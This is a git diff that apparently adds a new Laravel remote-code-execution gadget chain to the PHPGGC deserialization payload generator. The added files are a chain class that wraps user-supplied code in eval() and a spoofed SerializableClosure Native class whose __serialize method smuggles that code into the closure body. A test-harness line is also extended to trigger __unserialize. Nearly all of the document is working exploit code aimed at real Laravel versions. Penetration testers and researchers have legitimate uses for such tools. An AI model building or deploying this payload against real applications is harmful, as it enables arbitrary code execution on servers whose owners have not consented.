diff --git a/gadgetchains/Laravel/RCE/23/chain.php b/gadgetchains/Laravel/RCE/23/chain.php
new file mode 100644
index 00000000..ea1a6eb4
--- /dev/null
+++ b/gadgetchains/Laravel/RCE/23/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE23 extends \PHPGGC\GadgetChain\RCE\PHPCode
+{
+    public static $version = 'v8.62.0 <= ?';
+    public static $vector = '__unserialize';
+    public static $author = 'maple3142';
+
+    public function generate(array $parameters)
+    {
+        // the code is executed in the expression of a return statement
+        // so eval is needed to handle the case of multiple statements
+        $code = $parameters['code'] . "exit;";
+        $escaped_code = "'" . addcslashes($code, "\\'") . "'";
+        $expr = "eval($escaped_code)";
+        return new \Laravel\SerializableClosure\Serializers\Native($expr);
+    }
+}
diff --git a/gadgetchains/Laravel/RCE/23/gadgets.php b/gadgetchains/Laravel/RCE/23/gadgets.php
new file mode 100644
index 00000000..1a00271e
--- /dev/null
+++ b/gadgetchains/Laravel/RCE/23/gadgets.php
@@ -0,0 +1,23 @@
+<?php
+
+namespace Laravel\SerializableClosure\Serializers {
+    class Native
+    {
+        public $code;
+
+        public function __construct($code)
+        {
+            $this->code = $code;
+        }
+
+        // target: https://github.com/laravel/serializable-closure/blob/cb291e4c998ac50637c7eeb58189c14f5de5b9dd/src/Serializers/Native.php#L167-L205
+
+        public function __serialize()
+        {
+            return [
+                'use' => false,
+                'function' => $this->code
+            ];
+        }
+    }
+}
diff --git a/lib/test_payload.php b/lib/test_payload.php
index d2d6b9cc..14df06c2 100755
--- a/lib/test_payload.php
+++ b/lib/test_payload.php
@@ -43,6 +43,7 @@
 	    break;
 	case '__destruct':
 	case '__wakeup':
+	case '__unserialize':
 		$payload = unserialize($payload);
         break;
     default: